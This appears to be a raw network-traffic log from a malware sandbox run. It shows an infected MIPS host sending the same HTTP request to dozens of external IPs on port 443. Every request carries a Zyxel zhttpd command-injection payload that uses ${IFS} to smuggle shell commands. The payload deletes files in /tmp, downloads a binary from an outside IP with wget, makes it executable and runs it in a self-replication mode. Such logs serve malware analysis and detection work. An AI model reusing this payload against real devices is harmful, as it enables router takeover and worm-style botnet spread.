                                                Jan 12, 2024 18:24:36.861763000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4537192.168.2.1337492118.154.7.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.861793995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4538192.168.2.135534084.240.228.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.861845016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4539192.168.2.1340920210.121.215.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.861891985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4540192.168.2.1360590176.250.234.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.861924887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4541192.168.2.1351130150.183.201.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.861948013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4542192.168.2.1335360195.114.26.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.861977100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4543192.168.2.134747242.141.100.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.862001896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4544192.168.2.1355292165.151.93.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.862051964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4545192.168.2.135245879.120.106.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.862077951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4546192.168.2.1334130208.124.108.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.862126112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4547192.168.2.136066440.156.11.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.862176895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4548192.168.2.1346344175.76.120.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.862215996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4549192.168.2.1341404101.140.102.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.862243891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4550192.168.2.134552054.219.209.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.870286942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4551192.168.2.134199079.124.90.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.870338917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4552192.168.2.1334470115.159.168.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.870379925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4553192.168.2.135477463.115.227.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.870408058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4554192.168.2.135051467.65.86.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.870455980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4555192.168.2.134191035.164.190.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.870477915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4556192.168.2.1333754170.226.179.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.870522976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4557192.168.2.1339936135.212.26.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.870547056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4558192.168.2.1349758167.227.174.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.870592117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4559192.168.2.1349454109.23.161.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.870620966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4560192.168.2.135863083.73.228.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.870654106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4561192.168.2.1351292154.29.239.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.870685101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4562192.168.2.1344072197.211.25.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.870744944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4563192.168.2.1359448133.172.86.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.870776892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4564192.168.2.1333778206.2.220.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.870830059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4565192.168.2.1357268177.128.160.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.870868921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4566192.168.2.1358930211.48.104.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.870902061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4567192.168.2.1344838221.108.232.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.870939016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4568192.168.2.1349412150.212.43.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.870985031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4569192.168.2.1343792137.114.217.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.871030092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4570192.168.2.1341466212.143.27.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.871052027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4571192.168.2.135344835.246.113.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.871098042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4572192.168.2.1350792205.45.199.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.871146917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4573192.168.2.133864846.243.252.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.871181965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4574192.168.2.133538280.255.216.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.871206999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4575192.168.2.1346376128.251.77.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.871231079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4576192.168.2.135492648.229.55.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.871260881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4577192.168.2.1357140153.251.169.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.871339083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4578192.168.2.1353836190.201.177.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.871350050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4579192.168.2.133616850.200.129.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.871377945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4580192.168.2.1339954202.48.110.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.871412039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4581192.168.2.135705444.224.238.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.871436119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4582192.168.2.1338690135.152.88.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.871484041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4583192.168.2.1357852119.230.241.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.871505022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4584192.168.2.1360134148.180.41.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.871560097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4585192.168.2.13560885.189.127.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.871603966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4586192.168.2.1349772156.22.239.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.871603966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4587192.168.2.1360002135.119.179.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.871654034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4588192.168.2.1333060187.20.240.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.871695042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4589192.168.2.1350752131.107.134.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.871720076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4590192.168.2.1334390204.25.145.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.871768951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4591192.168.2.1349708121.9.119.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.871828079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4592192.168.2.1337478111.178.196.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.871856928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4593192.168.2.133485452.20.161.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.871880054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4594192.168.2.1354260217.10.237.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.871908903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4595192.168.2.135372857.101.247.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.871962070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4596192.168.2.133683665.60.211.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.871994972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4597192.168.2.1338170133.181.149.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.872037888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4598192.168.2.1338258103.63.164.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.872071981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4599192.168.2.1345594125.162.97.128443
                                                TimestampBytes transferredDirectionData
